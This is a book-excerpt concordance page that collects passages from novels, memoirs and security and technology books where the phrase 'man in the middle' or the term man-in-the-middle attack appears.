blue-collar work, centre right, creative destruction, delayed gratification, George Santayana, income inequality, MITM: man-in-the-middle, moral panic, new economy, Ronald Reagan, The Bell Curve by Richard Herrnstein and Charles Murray, the built environment, urban renewal, War on Poverty

Her life and the lives of the other students we’ve met demonstrate that habits of mind, reflection and thoughtfulness, exploration and experimentation can be sparked both in classrooms and in the workshop, reading a book and learning a trade. We ourselves have to be more creative in fusing book and workshop for those who go to school to fashion a better life. 80 four Who We Are: Portraits from an Urban Community College I. Remedial English “Forlorn,” the instructor, Mr. Quijada, asks, looking up from the essay the class is discussing. “What’s forlorn mean?” “Desire,” says the older man in the middle of the room—glasses, graying dreadlocks pulled back—then in the same breath adds “longing.” “Close, Leonard,” Mr. Quijada replies. “Longing can certainly lead to being forlorn.” Casually strategic, Mr. Quijada looks to the last row. “Kimberly, it’s good to see you back. Do you want to add to Leonard’s definition?” Kimberly shakes her head, softly says “no,” and looks to the young woman in the hoodie next to her who answers, “Sad; it means to be sad.”


The Minor Adjustment Beauty Salon: No. 1 Ladies' Detective Agency by Alexander McCall Smith

MITM: man-in-the-middle

At one level the answer was simple—he had never vacuumed the house—but there was an even more profound issue to be resolved: Did they even have a vacuum cleaner? If there was no vacuum cleaner, then it would look less bad for him that he had never used one in the house. Mind you, he had never swept the house either—and they did have a broom. A forest of hands went up, but it did not include his. Keitumeste pointed at a man in the middle. “Yes, Rra? When did you do that?” The man answered in a clear, confident voice. “Yesterday, Mma. I vacuumed the living room and the dining room, too. I would have done more if I had not been so tired.” Keitumeste nodded. “And what sort of vacuum cleaner is it, Rra?” The question, so innocently put, found its target. The man opened his mouth to speak, and then closed it. “You don’t know, do you?”


pages: 266 words: 80,018

The Snowden Files: The Inside Story of the World's Most Wanted Man by Luke Harding

affirmative action, airport security, Anton Chekhov, Apple's 1984 Super Bowl advert, Berlin Wall, Chelsea Manning, don't be evil, drone strike, Edward Snowden, Etonian, Firefox, Google Earth, Jacob Appelbaum, job-hopping, Julian Assange, Khan Academy, kremlinology, Mark Zuckerberg, Maui Hawaii, MITM: man-in-the-middle, national security letter, Panopticon Jeremy Bentham, pre–internet, Ralph Waldo Emerson, rolodex, Rubik’s Cube, Silicon Valley, Skype, social graph, Steve Jobs, undersea cable, web application, WikiLeaks

He (or it could have been a she) wrote: ‘I have some stuff you might be interested in.’ ‘He was very vague,’ Greenwald recalls. This mystery correspondent had an unusual request: he asked Greenwald to install PGP encryption software on to his laptop. Once up and running, it allows two parties to carry out an encrypted online chat. If used correctly, PGP guarantees privacy (the initials stand for ‘Pretty Good Privacy’); it prevents a man-in-the-middle attack by a third party. The source didn’t explain why this curious measure was needed. Greenwald had no objections – he had been meaning for some time to set up a tool widely employed by investigative journalists, by WikiLeaks and by others suspicious of government snooping. But there were two problems. ‘I’m basically technically illiterate,’ he admits. Greenwald also had a lingering sense that the kind of person who insisted on encryption might turn out to be slightly crazy.


pages: 313 words: 75,583

Ansible for DevOps: Server and Configuration Management for Humans by Jeff Geerling

AGPL, Amazon Web Services, cloud computing, continuous integration, database schema, Debian, defense in depth, DevOps, fault tolerance, Firefox, full text search, Google Chrome, inventory management, loose coupling, microservices, Minecraft, MITM: man-in-the-middle, Ruby on Rails, web application

Try running traceroute google.com in your terminal. Look at each of the hops between you and Google’s CDN. Do you know who controls each of the devices between your computer and Google? Do you trust these operators with all of your personal or corporate secrets? Probably not. Each of these connection points—and each network device and cable connecting them—is a weak point exposing you to a man-in-the-middle attack. Strong encryption is needed between your computer and the destination if you want to ensure data security. rlogin, rsh and rcp rlogin was introduced in BSD 4.2 in 1983, and has been distributed with many UNIX-like systems alongside Telnet until recently. rlogin was used widely during the 80s and much of the 90s. Just like Telnet, a user could log into the remote system with a password, but rlogin additionally allowed automatic (passwordless) logins for users on trusted remote computers. rlogin also worked better than telnet for remote administration, as it worked correctly with certain characters and commands where telnet required extra translation.


pages: 302 words: 74,350

I Hate the Internet: A Novel by Jarett Kobek

Anne Wojcicki, Burning Man, disruptive innovation, East Village, Edward Snowden, Golden Gate Park, Google bus, Google Glasses, Google X / Alphabet X, immigration reform, indoor plumbing, informal economy, Jeff Bezos, liberation theology, Mark Zuckerberg, MITM: man-in-the-middle, Norman Mailer, nuclear winter, packet switching, PageRank, Peter Thiel, quantitative easing, Ray Kurzweil, rent control, Ronald Reagan, Silicon Valley, Steve Jobs, technological singularity, Triangle Shirtwaist Factory, union organizing, V2 rocket, Vernor Vinge, wage slave, Whole Earth Catalog

A few months after graduation, Dennis offered Erik a job with Fear and Respect Holdings Ltd. Dennis formed Fear and Respect with a capital seed of $100,000,000. The money was a graduation present from his father. For over three decades, the old man, His Royal Highness Fatih bin Muhammad bin Abdulaziz al Saud, had run his own company. He’d built it into a powerhouse and made himself the third richest man in the Middle East. One of Fatih bin Muhammad’s few failures came during the dotcom era of the 1990s, when he’d lost a lot of money on bad investments. The most notorious was Kozmo.com. Kozmo.com was a one-hour delivery service that sold goods below cost and hoped to make up the money on delivery fees. The hysteria of the moment was such that even with a business model dedicated to losing money, the company raised about $250,000,000 in capital.


pages: 338 words: 74,302

Only Americans Burn in Hell by Jarett Kobek

AltaVista, coherent worldview, corporate governance, crony capitalism, Donald Trump, East Village, ghettoisation, Google Chrome, haute couture, illegal immigration, indoor plumbing, Jeff Bezos, mandelbrot fractal, MITM: man-in-the-middle, pre–internet, sexual politics, Skype, Snapchat, Steve Jobs, Telecommunications Act of 1996

If people require safe spaces, then I see nothing wrong with providing them, as long as the institution tempers their presence with a robust environment of educational rigor.” When the questions were over, pleasantries were exchanged. HRH texted his manservant Dmitri Huda. “HEY NONNY HEY, ARE THINGS IN ORDER?????” asked HRH. “Yes, Dennis,” texted Dmitri Huda. “I’m downstairs.” HRH’s father Fatih bin Muhammad bin Abdulaziz Al Saud was the second-richest man in the Middle East. He built a fortune after being exiled from the Kingdom. This exile followed the parking-lot execution of Misha’al bint Fahd bin Muhammad bin Abdulaziz Al Saud. Fatih bin Muhammad was a convenient scapegoat for the assassination. It was said that he encouraged delusions of romance in Misha’al. He was given the riyal equivalent of $200,000. He was kicked the fuck out. He traded off the family name, got into construction and concrete, and used that money to diversify his holdings.


pages: 1,380 words: 190,710

Building Secure and Reliable Systems: Best Practices for Designing, Implementing, and Maintaining Systems by Heather Adkins, Betsy Beyer, Paul Blankinship, Ana Oprea, Piotr Lewandowski, Adam Stubblefield

anti-pattern, barriers to entry, bash_history, business continuity plan, business process, Cass Sunstein, cloud computing, continuous integration, correlation does not imply causation, create, read, update, delete, cryptocurrency, cyber-physical system, database schema, Debian, defense in depth, DevOps, Edward Snowden, fault tolerance, fear of failure, general-purpose programming language, Google Chrome, Internet of things, Kubernetes, load shedding, margin call, microservices, MITM: man-in-the-middle, performance metric, pull request, ransomware, revision control, Richard Thaler, risk tolerance, self-driving car, Skype, slashdot, software as a service, source of truth, Stuxnet, Turing test, undersea cable, uranium enrichment, Valgrind, web application, Y2K, zero day

You can create this environment in various ways—for example, through a sandbox on the same machine as the orchestrator, or by running on a separate machine. Unauthenticated inputs Even if the user and build steps are trustworthy, most builds have dependencies on other artifacts. Any such dependency is a surface through which adversaries can potentially subvert the build. For example, if the build system fetches a dependency over HTTP without TLS, an attacker can perform a man-in-the-middle attack to modify the dependency in transit. For this reason, we recommend hermetic builds (see “Hermetic, Reproducible, or Verifiable?”). The build process should declare all inputs up front, and only the orchestrator should fetch those inputs. Hermetic builds give much higher confidence that the inputs listed in the provenance are correct. Once you’ve accounted for untrusted and unauthenticated inputs, your system resembles Figure 14-6.

Your environment may have other secrets that need attention, such as keys used for encryption of data at rest and cryptographic keys used for SSL. If your frontend web serving infrastructure is compromised or potentially accessible by an attacker, you may need to consider rotating your SSL keys. If you don’t take action after an attacker steals your keys, they might use the keys to perform a man-in-the-middle attack. Similarly, if the encryption key for records in your database is on a compromised database server, the safest path forward is to rotate the keys and reencrypt the data. Cryptographic keys are often used for application-level communications, as well. If the attacker had access to systems where such application-level keys are stored, you’ll want to rotate the keys. Carefully consider where you store API keys, such as the keys you use for cloud-based services.


The Perfect Storm: A True Story of Men Against the Sea by Sebastian Junger

Dava Sobel, MITM: man-in-the-middle, North Sea oil, urban renewal

If the rescuers can't get Smith by helicopter, they'll get him by ship; if they can't get him by ship, they'll drop a life raft; if he's too weak to get into the life raft, they'll drop a rescue swimmer. Smith is one of their own, and they're going to get him one way or another. It's full dark when the first helicopter, zeroed-in by the marker buoy, arrives on-scene. There's no sign of Smith. The Coast Guard pilot who spotted him, debriefed back on-base, says the dye was fresh and he was "awful sure" there was a man in the middle of it. The seas were too rough to tell whether he swam to the life raft that was dropped to him, though. Three hours later one of the helicopter pilots radios that they've spotted Smith near the radio marker buoy. Another H-60 and tanker plane prepare to launch from Suffolk, but no sooner are those orders given than the pilot on-scene corrects himself: He didn't spot a person, he spotted a life raft.


pages: 274 words: 85,557

DarkMarket: Cyberthieves, Cybercops and You by Misha Glenny

Berlin Wall, Bretton Woods, Brian Krebs, BRICs, call centre, Chelsea Manning, Fall of the Berlin Wall, illegal immigration, James Watt: steam engine, Julian Assange, MITM: man-in-the-middle, pirate software, Potemkin village, reserve currency, Silicon Valley, Skype, Stuxnet, urban sprawl, white flight, WikiLeaks, zero day

This jumbled crossroads of imperial ambition, peculiar modern cultural icons and the dreamy nature of light form an ideal backdrop for the annual gathering of the Cooperative Cyber Defence Centre of Excellence (CCDOE), the NATO-backed complex that researches all aspects of cyber warfare. The characters at this conference live in a contemporary Wonderland where convention is oft disregarded – ponytails and wire-rimmed glasses earnestly exchange information with starched military uniforms about ‘SQL injection vulnerabilities’. Besuited civil servants are deep in conversation with young men in jeans and T-shirts detailing the iniquities of ‘man-in-the-middle attacks’. To grasp even the very basics of cyber security in its rich variety, one must be prepared to learn countless new idioms that are being constantly added to or amended. Otherwise you can listen to a conversation that in basic vocabulary and syntax structure is unmistakably English, but is nonetheless completely meaningless to those unschooled in the arcane language. It is, of course, embarrassing continually having to ask people fluent in the tongue why a ‘buffer overload’ can have alarming consequences for the security of your network, but geeks are not a patronising clan and are generally happy to oblige.


pages: 278 words: 83,504

Boeing Versus Airbus: The Inside Story of the Greatest International Competition in Business by John Newhouse

Airbus A320, airline deregulation, Bay Area Rapid Transit, Build a better mousetrap, corporate governance, demand response, low cost airline, low cost carrier, MITM: man-in-the-middle, upwardly mobile

However, dropping the protectionist rules would require changes in domestic law, and Congress, if asked, was certain to refuse amending existing law unless other countries—notably Britain, France, Germany, and Japan—extended reciprocal benefits to the United States.7 To no one’s surprise, BA’s proposed merger with USAir churned up political turmoil. Two strong multistate lobbies formed up. One, belonging to BA-USAir, fought hard and resourcefully to maneuver approval of the deal. The other fought just as hard on behalf of the big three/fat four, and it held better cards. The man in the middle was Andrew Card, then secretary of transportation and until recently President George W. Bush’s chief of staff. Given the prohibition on foreign ownership, Card would have had to veto the deal if it appeared to transfer control of USAir to BA. However, BA was proposing to acquire 21 percent of the voting stock and one-fourth of the board membership. That degree of control would have provided a blocking minority, one that could have enabled BA to approve or disapprove major aircraft purchases and capital outlays.


pages: 234 words: 84,737

We Are Never Meeting in Real Life by Samantha Irby

Affordable Care Act / Obamacare, MITM: man-in-the-middle, obamacare, rolodex, Rosa Parks, sensible shoes, Silicon Valley, Steve Jobs, white flight, Zipcar

At some point in the evening I would have to take you aside to explain that I was going to sell the children’s piano to fund the latest of my father’s harebrained schemes, but that he’d assured me that this one was going to be the one that finally paid back a return on my investment. There’d inevitably be a fight of some kind, resulting in your having to drive my sobbing mother home and my body-slamming an old-ass man in the middle of the TV room while your kids cower in fear in the kitchen. So I guess what I’m saying is that death can sometimes be pretty great. — I will have to keep your parents at arm’s length because yours is the kind of family that goes on extended vacations in the wilderness together, and I’m afraid that if they like me too much, they will expect me to go with, and I am doing no such thing. You get only one chance to drag me to the woods, and I already let you take me to that isolated cabin in the middle of nowhere for three days with no phone and no Wi-Fi, so see you when you get back.


pages: 746 words: 221,583

The Children of the Sky by Vernor Vinge

combinatorial explosion, epigenetics, indoor plumbing, megacity, MITM: man-in-the-middle, random walk, risk tolerance, technological singularity, the scientific method, Vernor Vinge

That doesn’t happen very often, and so far, Mr. Radio has kept it a secret from all the packs who are using him.” “Hmm,” said Ravna. “I wonder if he’s smart enough to play Princess Pretending.” “Huh?” The word came from both Amdi and Jefri. After a moment Ritl chimed in with a mimic interrogative of her own. “Sorry.” She had violated her personal ban on Princesses. “Straumers call it a ‘Man in the Middle’ attack.” “Oh yeah,” said Amdi, “I thought of that. The problem is Vendacious has conditioned all the members to follow certain forwarding protocols. At best Mr. Radio is variably intelligent. From moment to moment, he may be smart enough for simultaneous lying. In between, he’ll drop the ball.” Jefri nodded. “And if he fluffs even once, the game is over.” “Right.” Zek’s own voice spoke over Amdi’s: “Besides, I still not good to be a person, even when I can think with all of me.”

Dekutomon’s Fyr was probably closer than it had ever been before. That meant that Mr. Radio was at least a threesome. There were likely two others fairly close, one that had been used for long-range relay to Fyr and one at the head of the chain to the Tropics. Right now the radio pack could easily be a fully-connected fivesome, perhaps even smarter than the night it had linked them with Amdi. Maybe such a pack couldn’t run a full Man-in-the-Middle, but all it had to do was not relay all it heard from here. If it was willing to risk its life.… She glanced at Jefri. He was as pale as he could be, stricken. He gave her a nod, understanding. Meantime, Zek still looked at them, intent. The creature had made a brave offer. Okay. Ravna nodded at him, and quietly asked something that might be innocuous even if it were relayed to listeners up and down Mr.


pages: 681 words: 214,967

A Peace to End All Peace: The Fall of the Ottoman Empire and the Creation of the Modern Middle East by David Fromkin

anti-communist, British Empire, colonial rule, Khartoum Gordon, Khyber Pass, MITM: man-in-the-middle, Monroe Doctrine, trade route

Archibald Wavell (later Field Marshal Earl Wavell), an officer who served under Allenby in the Palestine campaign, commenting on the treaties bringing the First World War to an end CONTENTS List of Illustrations and Maps 10 Photo Credits 11 Acknowledgments 12 A Note on Spelling 14 Introduction 15 PART I At the Crossroads of History 1 THE LAST DAYS OF OLD EUROPE 23 2 THE LEGACY OF THE GREAT GAME IN ASIA 26 3 THE MIDDLE EAST BEFORE THE WAR 33 4 THE YOUNG TURKS URGENTLY SEEK AN ALLY 45 5 WINSTON CHURCHILL ON THE EVE OF WAR 51 6 CHURCHILL SEIZES TURKEY'S WARSHIPS 54 7 AN INTRIGUE AT THE SUBLIME PORTE 62 PART II Kitchener of Khartoum Looks Ahead 8 KITCHENER TAKES COMMAND 9 KITCHENER'S LIEUTENANTS 10 KITCHENER SETS OUT TO CAPTURE ISLAM 11 INDIA PROTESTS 12 THE MAN IN THE MIDDLE PART III Britain is Drawn into the Middle Eastern Quagmire 13 THE TURKISH COMMANDERS ALMOST LOSE THE WAR 14 KITCHENER ALLOWS BRITAIN TO ATTACK TURKEY 15 ON TO VICTORY AT THE DARDANELLES 16 RUSSIA'S GRAB FOR TURKEY 17 DEFINING BRITAIN'S GOALS IN THE MIDDLE EAST 18 AT THE NARROWS OF FORTUNE 19 THE WARRIORS 20 THE POLITICIANS 21 THE LIGHT THAT FAILED 79 88 96 106 111 119 124 130 137 146 150 155 159 163 22 CREATING THE ARAB BUREAU 168 23 MAKING PROMISES TO THE ARABS 173 24 MAKING PROMISES TO THE EUROPEAN ALLIES 188 25 TURKEY'S TRIUMPH AT THE TIGRIS 200 PART IV Subversion 26 BEHIND ENEMY LINES 207 27 KITCHENER'S LAST MISSION 216 28 HUSSEIN'S REVOLT 218 PART V The Allies at the Nadir of Their Fortunes 29 THE FALL OF THE ALLIED GOVERNMENTS: BRITAIN AND FRANCE 231 30 THE OVERTHROW OF THE CZAR 239 PART VI New Worlds and Promised Lands 31 THE NEW WORLD 253 32 LLOYD GEORGE'S ZIONISM 263 33 TOWARD THE BALFOUR DECLARATION 276 34 THE PROMISED LAND 284 PART VII Invading the Middle East 35 JERUSALEM FOR CHRISTMAS 305 36 THE ROAD TO DAMASCUS 315 37 THE BATTLE FOR SYRIA 332 PART VIII The Spoils of Victory 38 THE PARTING OF THE WAYS 351 39 BY THE SHORES OF TROY ' 363 PART IX The Tide Goes Out 40 THE TICKING CLOCK 383 41 BETRAYAL 389 42 THE UNREAL WORLD OF THE PEACE CONFERENCES 403 PART X Storm over Asia 43 THE TROUBLES BEGIN: 1919—1921 415 44 EGYPT: THE WINTER OF 1918—1919 417 45 AFGHANISTAN: THE SPRING OF 1919 421 46 ARABIA: THE SPRING OF 1919 424 47 TURKEY: JANUARY 1920 427 48 SYRIA AND LEBANON: THE SPRING AND SUMMER OF 1920 435 49 EASTERN PALESTINE (TRANSJORDAN): 1920 441 50 PALESTINE—ARABS AND JEWS: 1920 4 45 51 MESOPOTAMIA (IRAQ): 1920 449 52 PERSIA (IRAN): 1920 4 5 5 PART XI Russia Returns to the Middle East 53 UNMASKING BRITAIN'S ENEMIES 465 54 THE SOVIET CHALLENGE IN THE MIDDLE EAST 471 55 MOSCOW'S GOALS 475 56 A DEATH IN BUKHARA 480 PART XII The Middle Eastern Settlement of 1922 57 WINSTON CHURCHILL TAKES CHARGE 493 58 CHURCHILL AND THE QUESTION OF PALESTINE 515 59 THE ALLIANCES COME APART 530 60 A GREEK TRAGEDY 540 61 THE SETTLEMENT OF THE MIDDLE EASTERN QUESTION 558 Notes 569 Bibliography 607 Index 621 8 CONTENTS CONTENTS LIST OF ILLUSTRATIONS AND MAPS 1 Lord Kitchener 2 Sir Mark Sykes 3 Enver 4 Talaat 5 Djemal 6 Crowds gather outside the Sublime Porte, 1913 7 Turkish soldiers at Dardanelles fort, 1915 8 Allied fleet at entrance to Dardanelles 9 Pictorial map of the Dardanelles 10 H.M.S.

Cairo and Constantinople both seemed to Simla to be pursuing policies that threatened to inflame Moslem passions in India and thus to imperil the Indian Empire. As the war progressed, British officials who ruled India increasingly came to believe that their most dangerous adversaries were neither the Turks nor the Germans, but the British officials governing Egypt; for despite India's protests, British Cairo went ahead with its intrigues in Mecca. 12 THE MAN IN THE MIDDLE i Mecca, where Mohammed was born, and Medina, to which he emigrated, are the holy cities that for Moslems everywhere give unique importance to the mountainous Hejaz, the long and narrow western section of the Arabian peninsula bordering the Red Sea. Hejaz means "separating"—a reference to the highlands that divide it from the plateau to the east. In the early twentieth century Arabia was an empty and desolate land, and the Hejaz, in the words of the 1910 Encyclopaedia Britannica, was "physically the most desolate and uninviting province in Arabia."


pages: 282 words: 92,998

Cyber War: The Next Threat to National Security and What to Do About It by Richard A. Clarke, Robert Knake

barriers to entry, complexity theory, data acquisition, Just-in-time delivery, MITM: man-in-the-middle, nuclear winter, packet switching, RAND corporation, Robert Hanssen: Double agent, Ronald Reagan, Silicon Valley, smart grid, South China Sea, Steve Jobs, trade route, undersea cable, Y2K, zero day

When plugged into a local or an Ethernet network, any user on the system can use a sniffer to pull in all the other traffic. The standard Ethernet protocol tells your computer to ignore everything that is not addressed to it, but that doesn’t mean it has to. An advanced packet sniffer on an Ethernet network can look at all the traffic. Your neighbors could sniff everything on the Internet on your street. More advanced sniffers can trick the network in what is known as a “man-in-the-middle” attack. The sniffer appears to the router as the user’s computer. All information is sent to the sniffer, which then copies the information before passing it on to the real addressee. Many (but not most) websites now use a secure, encrypted connection when you log on so that your password is not sent in the clear for anyone sniffing around to pick up. Due to cost and speed, most then drop the connection back into an unsecure mode after the password transmission is made.


Fearsome Particles by Trevor Cole

call centre, clean water, Khartoum Gordon, late fees, MITM: man-in-the-middle

“There’s people waiting,” said the girl, whose orange-and-white paper cap sat square on her head, suggestive of someone who took pride in her work, which Gerald would normally have applauded. She smiled insistently at him and Gerald smiled back. “He’s just going to be a minute.” Gerald turned and saw three people in line behind him. “It’ll just be a minute,” he repeated. “What are we waiting for?” said a wind-breakered woman at the end. “Some jerk gone to his car,” said a middle-aged farmer-type behind Gerald. A brokerish-looking man in the middle looked at the ceiling and sighed. “This is ridiculous,” said the woman. Gerald began to feel hot, and a little damp. He wanted to take off the jacket of his suit but he feared these people would mistake the movement for some sort of capitulation, and he had given the obese man his word. “He was in line before us,” said Gerald, addressing the queue. “He’s trying to treat his family. You would want the same courtesy.”


pages: 317 words: 98,745

Black Code: Inside the Battle for Cyberspace by Ronald J. Deibert

4chan, Any sufficiently advanced technology is indistinguishable from magic, Brian Krebs, call centre, citizen journalism, cloud computing, connected car, corporate social responsibility, crowdsourcing, cuban missile crisis, data acquisition, failed state, Firefox, global supply chain, global village, Google Hangouts, Hacker Ethic, informal economy, invention of writing, Iridium satellite, jimmy wales, John Markoff, Kibera, Kickstarter, knowledge economy, low earth orbit, Marshall McLuhan, MITM: man-in-the-middle, mobile money, mutually assured destruction, Naomi Klein, new economy, Occupy movement, Panopticon Jeremy Bentham, planetary scale, rent-seeking, Ronald Reagan, Ronald Reagan: Tear down this wall, Silicon Valley, Silicon Valley startup, Skype, smart grid, South China Sea, Steven Levy, Stuxnet, Ted Kaczynski, the medium is the message, Turing test, undersea cable, We are Anonymous. We are Legion, WikiLeaks, zero day

See also Citizen Lab, “Planet Blue Coat: Mapping Censorship and Surveillance Tools,” January 15, 2013, https​://citi​zenla​b.org​/plan​etblue​coat. 4 the website of Al-Manar: Citizen Lab documented the hosting of Hezbullah and Syrian government websites on servers based in Canada in “The Canadian Connection: An Investigation of Syrian Government and Hezbullah Web Hosting in Canada,” November 17, 2011, ​htt​p://citizenlab.or​g/wp-con​tent/up​loads​/20​11/​11/​canad​ian​_​conne​ctio​n.pdf; and “The Canadian Connection: One Year Later,” November 14, 2012, htt​ps://​citize​nlab.or​g/20​12/1​1/t​he-can​adia​n-co​nnect​ion-o​ne-ye​ar-lat​er/. 5 reports from inside Syria of phishing attacks: On phishing attacks around the Syrian conflict, see Eva Galperin and Morgan Marquis-Boire, “Syrian Activists Targeted with Facebook Phishing Attack,” Electronic Frontier Foundation, March 29, 2012, htt​ps://w​ww.eff.o​rg/deep​links​/201​2/03​/pro-s​yrian-gov​ernment-​hackers-t​arget-syri​an-activ​ists-fac​ebook-ph​ishin​g-att​ack; and Eva Galperin and Morgan Marquis-Boire, “New Wave of Facebook Phishing Attacks Targets Syrian Activists,” Electronic Frontier Foundation, April 24, 2012, http​s://www.ef​f.org/dee​plinks​/20​12/0​4/new-w​ave-face​book-ph​ishi​ng-att​acks-tar​gets-syr​ian-acti​vists. See also Peter Eckersley, “A Syrian Man-In-The-Middle Attack Against Facebook,” Electronic Frontier Foundation, May 5, 2011, https​://www.ef​f.org/de​eplin​ks/201​1/​05/​syri​an-ma​n-midd​le-aga​inst-f​acebo​ok; and Jennifer Preston, “Seeking to Disrupt Protesters, Syria Cracks Down on Social Media,” New York Times, March 23, 2011, http://ww​w.nytim​es.com/20​11/05/23​/world/​middlee​ast/23fac​ebook.​html​?_​r=4. Since March 2012, the Electronic Frontier Foundation has been collecting and analyzing malware that pro-Syrian-regime hackers have used to target the Syrian opposition.


pages: 342 words: 94,762

Wait: The Art and Science of Delay by Frank Partnoy

algorithmic trading, Atul Gawande, Bernie Madoff, Black Swan, blood diamonds, Cass Sunstein, Checklist Manifesto, cognitive bias, collapse of Lehman Brothers, collateralized debt obligation, computerized trading, corporate governance, Daniel Kahneman / Amos Tversky, delayed gratification, Flash crash, Frederick Winslow Taylor, George Akerlof, Google Earth, Hernando de Soto, High speed trading, impulse control, income inequality, information asymmetry, Isaac Newton, Long Term Capital Management, Menlo Park, mental accounting, meta analysis, meta-analysis, MITM: man-in-the-middle, Nick Leeson, paper trading, Paul Graham, payday loans, Ralph Nader, Richard Thaler, risk tolerance, Robert Shiller, Robert Shiller, Ronald Reagan, Saturday Night Live, six sigma, Spread Networks laid a new fibre optics cable between New York and Chicago, Stanford marshmallow experiment, statistical model, Steve Jobs, The Market for Lemons, the scientific method, The Wealth of Nations by Adam Smith, upwardly mobile, Walter Mischel

As John Gottman, the marriage guru, explains, “The reason our swift analysis works is because each thin slice of data is actually grounded in a tremendous amount of ‘thick slicing’—i.e., huge volumes of data that we’ve been collecting and validating on thousands of other couples for more than thirty years.”35 It turns out that a doctor glancing at a photograph of a black patient and a student watching a two-second video of a teacher are performing similar tasks. So is a young American woman looking at images of terrorist cells in the Middle East, or a young man in the Middle East looking at images of ostentatious wealth in America. Or any number of people everywhere who judge others based on first impressions. When we thin-slice, we reach powerful unconscious conclusions about others in seconds. Unfortunately, they are often wrong. Fortunately, they can be consciously unwound. Even contagious beliefs can reverse their spread. The authors of the racial contagion study worried about what happens when “a child feels her father grip her hand a little more tightly as they pass a black man on the street; or a little boy views his mother speak less and make less eye contact than usual while transacting with a black cashier at the supermarket.”36 But they also concluded, more hopefully, that “the flip side of these results, of course, is that acts of genuine egalitarianism can also shape racial attitudes toward equality.”37 Substitute any stereotyped group into the above passages and you have an apt description of many of the world’s problems.


pages: 324 words: 91,653

The Quantum Thief by Hannu Rajaniemi

augmented reality, cognitive dissonance, gravity well, haute couture, MITM: man-in-the-middle, music of the spheres

There are loops in it, places where a node – representing a memory, an event, a person – has more than one parent. That means that sometimes, sharing gevulot about an innocuous memory, a taste or an intimate moment, can unlock whole swathes of a person’s exomemory. The gogol pirates have software that tries to map out a person’s gevulot tree, tries to scan for the key nodes in conversation. There is a man-in-the-middle attack software that attempts to intercept the quantum communications between a Watch and the exomemory. That will require a lot more brute force, and quantum computation capability besides: I will have to talk to Perhonen about that. A perfect emulation of the privacy sense organ which I want to start running immediately. And finally, a set of public/private keys and blank exomemories to choose from.


pages: 329 words: 95,309

Digital Bank: Strategies for Launching or Becoming a Digital Bank by Chris Skinner

algorithmic trading, AltaVista, Amazon Web Services, Any sufficiently advanced technology is indistinguishable from magic, augmented reality, bank run, Basel III, bitcoin, business cycle, business intelligence, business process, business process outsourcing, buy and hold, call centre, cashless society, clean water, cloud computing, corporate social responsibility, credit crunch, crowdsourcing, cryptocurrency, demand response, disintermediation, don't be evil, en.wikipedia.org, fault tolerance, fiat currency, financial innovation, Google Glasses, high net worth, informal economy, Infrastructure as a Service, Internet of things, Jeff Bezos, Kevin Kelly, Kickstarter, M-Pesa, margin call, mass affluent, MITM: man-in-the-middle, mobile money, Mohammed Bouazizi, new economy, Northern Rock, Occupy movement, Pingit, platform as a service, Ponzi scheme, prediction markets, pre–internet, QR code, quantitative easing, ransomware, reserve currency, RFID, Satoshi Nakamoto, Silicon Valley, smart cities, social intelligence, software as a service, Steve Jobs, strong AI, Stuxnet, trade route, unbanked and underbanked, underbanked, upwardly mobile, We are the 99%, web application, WikiLeaks, Y2K

The bad news about mobile As every bank is getting into mobile, there are issues. A good example is the coordinated ZeuS malware attack in Q4 2010, where a web application supposedly from the bank asks the victim to input their mobile phone number. The victim is then asked via text message to install an application onto the phone and the application is used to intercept any text messages the victim sends thereafter. There is also a whole load of new man-in-the-middle and mobile malware attacks that are growing by the day such as a recent Facebook update about Justin Bieber, which resulted in over 100,000 in 24 hours with 27% via mobile Facebook. Every viewing downloaded malware. Then there is mobile hi-jacking, where you think you are on your mobile carrier’s network but you’re not. This is where a cybercriminal places a signal box near to the location of the person they are targeting.


pages: 299 words: 87,059

The Burning Land by George Alagiah

fear of failure, land reform, MITM: man-in-the-middle, Nelson Mandela, out of africa, pre–internet, urban decay, white flight, éminence grise

‘But how does sitting back and watching Motlantshe come here, buy up the land and sell it off to foreigners help?’ ‘You think this is Motlantshe? You think he can do all these deals on his own and just keep the money to himself?’ Patel turned the engine off. ‘Ms Seaton, you need to know this whole stinking business goes all the way to the top. Those chaps in Pretoria are getting their cut. Motlantshe is just the deal-maker, the man in the middle.’ ‘But the figures are all published.’ ‘Oh, yes, they publish the figures they want you to see. The government got all these farms around here for nothing. Why didn’t the farmers shout and scream, eh?’ ‘You tell me.’ ‘Because our friend Motlantshe went round afterwards and paid them off.’ ‘What’s in it for Motlantshe?’ ‘The land is not sold outright to the foreign players. It is kept in a holding company, fifty-fifty.


pages: 342 words: 104,315

The Icon Thief by Alec Nevala-Lee

index card, MITM: man-in-the-middle

As he threw the switches one by one, hidden quadrants of the store came into view, revealing row after row of beds, desks, tables. Ilya surveyed the showroom. Aside from the three men on the couch, the sales floor was deserted. As they approached the Armenians, Ilya saw that the two on either side were barely out of high school, while the third seemed in his late twenties. When the two groups were close enough, Sharkovsky came forward, met by the man in the middle, and they shook hands twice, first the right, then the left. Standing back, Sharkovsky studied the younger man. “How is your grandfather, Arshak?” Arshak made a noncommittal gesture. “Are we here to talk, or to do business?” Sharkovsky did not seem troubled by this show of impatience. “Business, if you like. We can start with the toys.” At his signal, Misha came forward with the duffel bag, which clanked softly as he set it on the ground.


pages: 366 words: 107,145

Fuller Memorandum by Stross, Charles

Any sufficiently advanced technology is indistinguishable from magic, Beeching cuts, British Empire, cognitive dissonance, complexity theory, congestion charging, dumpster diving, finite state, Firefox, HyperCard, invisible hand, land reform, linear programming, MITM: man-in-the-middle, peak oil, post-work, security theater, sensible shoes, side project, Sloane Ranger, telemarketer, Turing machine

And that's another ten minutes wasted, bringing Iris up to speed on one of the minutiae of my job. It's not her fault she doesn't know where the dividing line between IT support scut-work and OPSEC protocol lies, although she catches on fast when I explain the predilection of class G3 abominations for traveling down Cat 5e cables and eating clerical staff, not to say anything about the ease with which a bad guy could stick a network sniffer on our backbone and do a man-in-the-middle attack on our authentication server if we let random cable installers loose under the floor tiles in the new building. Finally she leaves me alone, and I open the cover on BLOODY BARON and start reading. AN HOUR AND A HALF LATER I'M THOROUGHLY SPOOKED BY MY reading--so much so that I've had to put the file down a couple of times when I caught myself scanning the same sentence over and over again with increasing disbelief.


pages: 628 words: 107,927

Node.js in Action by Mike Cantelon, Marc Harter, Tj Holowaychuk, Nathan Rajlich

Amazon Web Services, Chris Wanstrath, create, read, update, delete, Debian, en.wikipedia.org, Firefox, Google Chrome, MITM: man-in-the-middle, MVC pattern, node package manager, p-value, pull request, Ruby on Rails, web application, WebSocket

